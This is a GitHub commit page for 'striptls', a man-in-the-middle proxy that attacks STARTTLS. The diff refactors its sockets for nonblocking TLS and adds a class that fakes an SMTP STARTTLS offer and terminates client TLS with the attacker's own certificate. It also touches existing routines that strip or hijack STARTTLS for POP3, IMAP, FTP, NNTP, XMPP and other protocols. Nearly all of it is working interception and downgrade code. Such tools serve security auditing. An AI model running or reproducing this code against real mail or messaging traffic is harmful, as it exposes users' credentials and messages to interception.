Skip to content

Commit

Permalink
refactor code for nonblocking ssl
Browse files Browse the repository at this point in the history
  • Loading branch information
tintinweb committed Mar 1, 2016
1 parent 9ba887f commit a68a979
Showing 1 changed file with 90 additions and 13 deletions.
103 changes: 90 additions & 13 deletions striptls/striptls.py
Original file line number Diff line number Diff line change
Expand Up @@ -40,12 +40,27 @@ def accept(self):
return self.socket.accept()

def recv(self, buflen=8*1024):
chunks = []
chunk = True
if self.socket_ssl:
self.recvbuf = self.socket_ssl.read(buflen)
data_pending = buflen
while chunk and data_pending:
chunk = self.socket_ssl.read(data_pending)
chunks.append(chunk)
data_pending = self.socket_ssl.pending()
else:
self.recvbuf = self.socket.recv(buflen)
chunks.append(self.socket.recv(buflen))
self.recvbuf = ''.join(chunks)
return self.recvbuf

def recv_blocked(self, buflen=8*1024, timeout=None):
end = time.time()+timeout if timeout else 0
while not timeout or time.time()<end:
try:
return self.recv(buflen=buflen)
except ssl.SSLWantReadError:
pass

def send(self, data):
if self.socket_ssl:
self.socket_ssl.write(data)
Expand All @@ -68,6 +83,7 @@ def ssl_wrap_socket(self, *args, **kwargs):
if not args and not kwargs.get('sock'):
kwargs['sock'] = self.socket
self.socket_ssl = ssl.wrap_socket(*args, **kwargs)
self.socket_ssl.setblocking(0) # nonblocking for select

def ssl_wrap_socket_with_context(self, ctx, *args, **kwargs):
if len(args)>=1:
Expand All @@ -77,6 +93,7 @@ def ssl_wrap_socket_with_context(self, ctx, *args, **kwargs):
if not args and not kwargs.get('sock'):
kwargs['sock'] = self.socket
self.socket_ssl = ctx.wrap_socket(*args, **kwargs)
self.socket_ssl.setblocking(0) # nonblocking for select

class ProtocolDetect(object):
PROTO_SMTP = 25
Expand Down Expand Up @@ -149,6 +166,7 @@ def __init__(self, proxy, inbound=None, outbound=None, target=None, buffer_size=
self.outbound = TcpSockBuff(outbound, peer=target)
self.buffer_size = buffer_size
self.protocol = ProtocolDetect(target=target)
self.datastore = {}

def __repr__(self):
return "<Session %s [client: %s] --> [prxy: %s] --> [target: %s]>"%(hex(id(self)),
Expand Down Expand Up @@ -241,7 +259,7 @@ def set_callback(self, name, f):
def main_loop(self):
self.input_list.add(self.inbound)
while True:
time.sleep(self.delay)
#time.sleep(self.delay)
inputready, _, _ = select.select(self.input_list, [], [])

for sock in inputready:
Expand All @@ -261,6 +279,10 @@ def main_loop(self):
try:
session = self.get_session_by_client_sock(sock)
session.notify_read(sock)
except ssl.SSLError, se:
if se.errno != ssl.SSL_ERROR_WANT_READ:
raise
continue
except SessionTerminatedException:
self.input_list.difference_update(session.get_peer_sockets())
logger.warning("%s terminated."%session)
Expand Down Expand Up @@ -393,7 +415,7 @@ def mangle_client_data(session, data, rewrite):

session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
resp_data = session.outbound.recv_blocked()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if "220" not in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
Expand All @@ -405,7 +427,62 @@ def mangle_client_data(session, data, rewrite):
elif "mail from" in data.lower():
rewrite.set_result(session, True)
return data


class InboundStarttlsProxy:
''' Inbound is starttls, outbound is plain
1) Do not mangle server data
2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.
in case client does not check keys
'''
@staticmethod
def mangle_server_data(session, data, rewrite):
# keep track of stripped server ehlo/helo
if any(e in session.outbound.sndbuf.lower() for e in ('ehlo','helo')) and "250" in data and not session.datastore.get("server_ehlo_stripped"): #only do this once
# wait for full line
while not "250 " in data:
data+=session.outbound.recv_blocked()

features = [f for f in data.strip().split('\r\n') if not "STARTTLS" in f]
if features and not features[-1].startswith("250 "):
features[-1] = features[-1].replace("250-","250 ") # end marker
# force starttls announcement
session.datastore['server_ehlo_stripped']= '\r\n'.join(features)+'\r\n' # stripped

if len(features)>1:
features.insert(-1,"250-STARTTLS")
else:
features.append("250 STARTTLS")
features[0]=features[0].replace("250 ","250-")
data = '\r\n'.join(features)+'\r\n' # forced starttls
session.datastore['server_ehlo'] = data

return data
@staticmethod
def mangle_client_data(session, data, rewrite):
if "STARTTLS" in data:
# do inbound STARTTLS
session.inbound.sendall("220 Go ahead\r\n")
logging.debug("%s [client] <= [ ][mangled] %s"%(session,repr("220 Go ahead\r\n")))
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain(certfile=Vectors._TLS_CERTFILE,
keyfile=Vectors._TLS_KEYFILE)
session.inbound.ssl_wrap_socket_with_context(context, server_side=True)
logging.debug("%s [client] <= [ ][mangled] waiting for inbound SSL Handshake"%(session))
# inbound ssl, fake server ehlo on helo/ehlo
indata = session.inbound.recv_blocked()
if not any(e in indata for e in ('ehlo','helo')):
raise ProtocolViolationException("whoop!? client did not send EHLO/HELO after STARTTLS finished.. proto violation: %s"%repr(indata))
logging.debug("%s [client] => [mangled] %s"%(session,repr(indata)))
session.inbound.sendall(session.datastore["server_ehlo_stripped"])
logging.debug("%s [client] <= [mangled] %s"%(session,repr(session.datastore["server_ehlo_stripped"])))
data=None
elif any(e in data for e in ('ehlo','helo')) and session.datastore.get("server_ehlo_stripped"):
# just do not forward the second ehlo/helo
data=None
elif "mail from" in data.lower():
rewrite.set_result(session, True)
return data

class ProtocolDowngradeStripExtendedMode:
''' Return error on EHLO to force peer to non-extended mode
'''
Expand Down Expand Up @@ -503,7 +580,7 @@ def mangle_client_data(session, data, rewrite):

session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
resp_data = session.outbound.recv_blocked()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if "+OK" not in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
Expand Down Expand Up @@ -577,7 +654,7 @@ def mangle_client_data(session, data, rewrite):

session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
resp_data = session.outbound.recv_blocked()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if "%s OK"%id not in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
Expand Down Expand Up @@ -650,7 +727,7 @@ def mangle_client_data(session, data, rewrite):

session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
resp_data = session.outbound.recv_blocked()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not resp_data.startswith("234"):
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
Expand Down Expand Up @@ -723,7 +800,7 @@ def mangle_client_data(session, data, rewrite):

session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
resp_data = session.outbound.recv_blocked()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not resp_data.startswith("382"):
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
Expand Down Expand Up @@ -776,7 +853,7 @@ def mangle_server_data(session, data, rewrite):
# do outbound starttls as required by server
session.outbound.sendall("<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>")
logging.debug("%s [client] => [server][mangled] %s"%(session,repr("<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>")))
resp_data = session.outbound.recv()
resp_data = session.outbound.recv_blocked()
if not resp_data.startswith("<proceed "):
raise ProtocolViolationException("whoop!? server announced STARTTLS *required* but fails to proceed. proto violation: %s"%repr(resp_data))

Expand Down Expand Up @@ -819,7 +896,7 @@ def mangle_client_data(session, data, rewrite):

session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
resp_data = session.outbound.recv_blocked()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not resp_data.startswith("<proceed "):
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
Expand Down Expand Up @@ -895,7 +972,7 @@ def mangle_client_data(session, data, rewrite):

session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
resp_data = session.outbound.recv_blocked()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not " OK " in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
Expand Down Expand Up @@ -1098,7 +1175,7 @@ def mangle_client_data(session, data, rewrite):

session.outbound.sendall(data)
logging.debug("%s [client] => [server] %s"%(session,repr(data)))
resp_data = session.outbound.recv()
resp_data = session.outbound.recv_blocked()
logging.debug("%s <= [server] %s"%(session,repr(resp_data)))
if not " 670 " in resp_data:
raise ProtocolViolationException("whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s"%repr(resp_data))
Expand Down

0 comments on commit a68a979

Please sign in to comment.